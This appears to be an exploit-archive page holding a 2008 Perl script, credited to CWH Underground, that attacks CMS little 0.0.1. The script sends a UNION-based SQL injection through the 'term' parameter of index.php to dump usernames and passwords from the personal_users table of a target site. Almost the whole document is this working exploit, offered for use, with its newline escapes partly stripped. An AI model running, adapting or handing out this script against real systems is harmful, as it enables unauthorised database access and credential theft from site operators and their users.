[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CMS little (index.php term) Remote SQL Injection Exploit
# Published : 2008-11-28
# Author : CWH Underground
# Previous Title : Bluo CMS 1.2 (index.php id) Blind SQL Injection Vulnerability
# Next Title : ReVou Twitter Clone (Auth Bypass) SQL Injection Vulnerability


???#!/usr/bin/perl -w
#==========================================================
# CMS little (index.php term) Remote SQL Injection Exploit
#==========================================================
#
#  ,--^----------,--------,-----,-------^--,
#  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
#  `+---------------------------^----------|
#    `_,-------, _________________________|
#      / XXXXXX /`|     /
#     / XXXXXX /  `   /
#    / XXXXXX /______(
#   / XXXXXX /           
#  / XXXXXX /
# (________(             
#  `------'
#
#AUTHOR : CWH Underground
#DATE : 28 November 2008
#SITE : cwh.citec.us
#
#
#####################################################
#APPLICATION : CMS little
#VERSION     : 0.0.1
#DOWNLOAD    : http://downloads.sourceforge.net/littlecms/CMSLite.zip
######################################################
#
#Note: magic_quotes_gpc = off
#
#######################################################################################
#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################


use LWP::UserAgent;
use HTTP::Request;

if ($#ARGV+1 != 2)
{
   print "n==============================================n";
   print "    CMS little Remote SQL Injection Exploit   n";
   print "                                              n";
   print "        Discovered By CWH Underground         n";
   print "==============================================n";
   print "                                              n";
   print "  ,--^----------,--------,-----,-------^--,   n";
   print "  | |||||||||   `--------'     |          O	n";
   print "  `+---------------------------^----------|   n";
   print "    `_,-------, _________________________|   n";
   print "      / XXXXXX /`|     /                      n";
   print "     / XXXXXX /  `   /                       n";
   print "    / XXXXXX /______(                        n";
   print "   / XXXXXX /                                 n";
   print "  / XXXXXX /   .. CWH Underground Hacking Team ..  n";
   print " (________(                                   n";
   print "  `------'                                    n";
   print "                                              n"; 
   print "Usage  : ./xpl.pl <Target> <Data Limit>n";
   print "Example: ./xpl.pl http://www.target.com/cmslite 10n";
   exit();
}

$target  = ($ARGV[0] =~ /^http:///) ?  $ARGV[0]:  'http://' . $ARGV[0];
$number = $ARGV[1];

print "n++++++++++++++++++++++++++++++++++++++++++++++++++++++";
print "n  ..:: SQL Injection Exploit By CWH Underground ::.. ";
print "n++++++++++++++++++++++++++++++++++++++++++++++++++++++n";
print "n[+]Dump Username and Passwordn";

for ($start=0;$start<$number;$start++) {

$xpl = LWP::UserAgent->new() or die "Could not initialize browsern";
$req = HTTP::Request->new(GET => $target."/index.php?term=a%%27%20and%201=2%20union%20select%201,concat(0x3a3a3a,name,0x3a3a,password,0x3a3a3a),3,4,5,6,7,8,9,10,11,12%20from%20personal_users%20limit%201%20offset%20".$start."--+and+1=1")or die "Failed to Connect, Try again!n";
$res = $xpl->request($req);
$info = $res->content;
$count=$start+1;

if ($info =~ /:::(.+):::/)
{
$dump=$1;
($username,$password)= split('::',$dump);
printf "n [$count]n [!]Username = $username n [!]Password = $passwordn";
}
else { 
	print "n [*]Exploit Done !!" or die "n [*]Exploit Failed !!n";
	exit;
}

# www.Syue.com [2008-11-28]